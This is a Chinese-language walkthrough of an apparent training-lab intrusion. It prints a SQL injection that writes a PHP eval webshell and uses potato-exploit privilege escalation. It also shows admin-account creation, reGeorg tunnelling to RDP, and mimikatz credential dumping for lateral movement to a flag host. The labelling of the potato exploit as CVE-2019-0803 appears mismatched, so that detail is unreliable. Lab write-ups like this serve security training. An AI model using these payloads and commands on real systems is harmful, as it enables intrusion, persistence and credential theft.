0x01. 基于sql注入的webshell

可以利用mysql的导出函数,将查询

  • into outfile()

例如:id=1 union select 1,‘’ into outfile ‘c:/phpstudy/www/1.php 将id=1和联合查询出来的值导出到c:/phpstudy/www/1.php中,id=1的内容可能有很多,那么可以写id=1.1 让其查询不出结果’

  • into dumpfile() (可以16进制写入.)

id=7.1 union select 1,‘’ into dumpfile ‘c:/phpstudy/www/1.php’

当知道绝对路径,且导出权限开启的时候就可以拿到webshell

DNS注入 load_file. @@datadir

数据具体位置存储的路径 @@basedir
小技巧:在传参的时候?id[]=1 加上中括号有时候可以看到报错信息

0x02. Getshell查看信息

1. 初步收集身份信息

  • whoami 查看当前用户权限
  • netstat -ano 查看本机开放的端口
  • tasklist 查看本机运行的程序
  • systeminfo 查看计算机详细信息

2. Windows提权姿势:

  • Metasploit Framework提权
  • 系统漏洞提权
  • Cobalt Strike提权
  • 调用高权限服务组件提权

0x03. 通过sql注入拿到webshell

通过sql注入,通过into outfile函数,导出查询结果一句话木马到指定文件,可以拿到webshell

首先将传参的类型改为数组,这样很多时候可以爆出网站的绝对路径,知道绝对路径之后,可以使用into outfile函数进行导出一句话木马文件。
http://afsgr16-b1ferw.aqlab.cn/?id=1 union select 1,'<?php eval($_REQUEST[8])?>' into outfile 'c:/phpstudy/www/alva.php';

因为这里前面id=1的时候我没有修改,所以说,原有的数据也给导出到alva.php文件里面去了。
菜刀连接,使用命令行,查看当前用户身份权限: whoami

输入 net user net localgroup administrators(查看管理员用户组有哪些成员)可以看到,还有其他两个用户,这里test用户并不是管理员权限,那么就需要进行提权。

权限是由身份决定的,菜刀连接的核心是运行PHP代码,那么权限就是由运行php代码的这个用户身份决定的。
不同的进程不同的服务可能对应着不同的权限,可以找到权限足够的进程来执行命令即可。

0x04. 如何提升权限

  • 找到其他服务,调用其他服务或进程来执行命令
  • 把shell弹到msf、cs上,使用工具提权
  • 利用系统的漏洞来进行权限提升。(systeminfo 查看当前系统配置)

这里可以看到系统已经打了什么补丁,可以到提权辅助网页去进行查询。

将系统已经打了的补丁写进去,然后点击查询即可。

这里主要是使用烂土豆(CVE-2019-0803)提权,直接将烂土豆exe上传到目标服务器上,随便修改一个名字,然后打开命令终端,输入修改过后的名字 如1.exe -p "需要执行的命令"

既然现在已经是system权限了,那么试着添加一个用户,并且将这个用户添加进管理员组里面试试。
net user 用户名 密码 /add  添加用户账号密码
net localgroup administrators 用户名 /add 添加用户到本地管理员组

0x05. 远程连接目标主机

拿到了管理员权限,那么是不是可以用3389端口进行远程连接呢?	
注意点:
	netstat -ano 可以看到开放了哪些端口。
	一个IP下面不一定只有一台服务器,可能还有一个庞大的内网。
	目标地址的3389端口不一定对应着有webshell服务器的3389端口,这里有一个概念,端口转发/映射
	简单来说,服务器1.1.1.2:80端口对应内网192.168.1.3:80端口,这时候1.1.1.2:80端口接收到的数据包会被发给1.1.1.3:80端口上。
	
解决方法:
	正向连接:在目标服务器上设置中转站。通过PHP设置中转站,信息给php,php发起请求。
	反向连接:让目标服务器访问攻击者,攻击者需要设置一台公网服务器让目标服务器和攻击者请求,然后构成连接,但是需要外网环境。

这里用正向连接来做,将reGeorg文件夹中的tunnel.nosocket.php上传到服务器上面,并且自定义一个简单的名字,然后到网页访问这个地址。

当上传这个文件并且web访问的时候内容返回的是以上图片中的内容,那么程序就是正常运转中。
接下来到reGeorg目录中运行reGeorgsocksProxy.py脚本。

当出现这个页面的时候就证明成功跑起来了,-h 可以查看帮助.

这里用-l 指定地址 -p 指定端口 -u 指定连接文件

本地:reGeorgSocksProxy.py -l 127.0.0.1 -p 10086 -u net.php
在这里要连接服务器则将后面的指定连接文件修改为 目标地址即为:

python2 reGeorgSocksProxy -l 127.0.0.1 -p 10086 -u [http://afsgr16-b1ferw.aqlab.cn/net.php](http://afsgr16-b1ferw.aqlab.cn/net.php)

给本机10086端口传送数据,这个数据就会被发送给目标服务器。

reGeorgScoksProxy连接后,使用proxifier进行连接。

添加代理服务器,写127.0.0.1 10086端口,然后检查一下,检查成功则连接成功

新建一个规则,可以根据应用、端口等触发,这里就用mstsc(远程连接)触发,动作是使用代理。
设置好规则之后,使用菜刀,执行命令iponfig查看本机ip,然后在攻击机的mstsc远程连接此ip,用户是使用之前所创建的管理员 alva

0x06. 如何抓取管理员账户密码

连接上之后,可以用nmap、ICMP协议、Arp-scan等探测内网存活主机有哪些

因为部分内网都是统一用户名和密码,所以这时候可以用**猕猴桃(mimikatz.exe)**来抓取管理员的账号密码

而在Windows server 2008中,管理员账户和密码都是明文的。
所以它可以从内存中提取纯文本密码,哈希和kerberos票证。

在windows server 2012上就不储存明文
mimikatz还可以执行哈希传递,票证传递或构建Golden票证。

现在在目标服务器上上传mimikatz.exe文件,并且用管理员权限运行

运行之后,输入log,生成日志文件,对mimikatz.exe进行的操作都会记录在这个文件里面。

然后进行权限提升,提升mimikatz可用的权限。
提升到最高的调试权限:privilege::debug

紧接着就可以进行抓取密码的操作了,输入sekurlsa::logonpasswords

命令执行之后,会将抓取到的数据全部存储在mimikatz.log文件中。

如此以来就抓到了管理员的账号密码了,利用内网密码唯一性,登录10.0.1.8主机,找到flag。
这时候需要用内网主机去连接10.0.1.8,用户名是默认的administrator 密码是我们所抓取到的密码。

总结:
通过sql注入导出文件权限,导出一句话木马。
通过菜刀连接,然后上传烂土豆进行提升权限
提权之后,需要远程连接到目标主机,但是因为3389端口映射/转发,所以不能确定该端口是映射的有木马的主机,这时候就需要用到正向连接,用php脚本做为沟通的桥梁,在目标主机上传reGeorg中的tunnel.nosocket.php文件,并且修改成一个简单的名字
使用python启动reGeorgSocksProxy.py,设置监听地址127.0.0.1,端口为不常用的任意端口,地址是之前上传的php文件的地址。
使用proxifier设置代理服务器为127.0.0.1,端口设置之前监听的端口,测试成功之后配置代理规则,因为这里是用mstsc.exe去连接目标主机,所以在应用程序中写mstsc.exe 动作使用代理即可。
用mstsc连接目标主机,进行抓取管理员账户密码的操作。上传mimikatz.exe,用管理员权限运行,然后输入log生成日志文件,输入`privilege::debug`开启最高权限调试,再输入输入`sekurlsa::logonpasswords`抓取管理员账户密码,命令执行之后抓取的内容会存入之前生成的log文件中。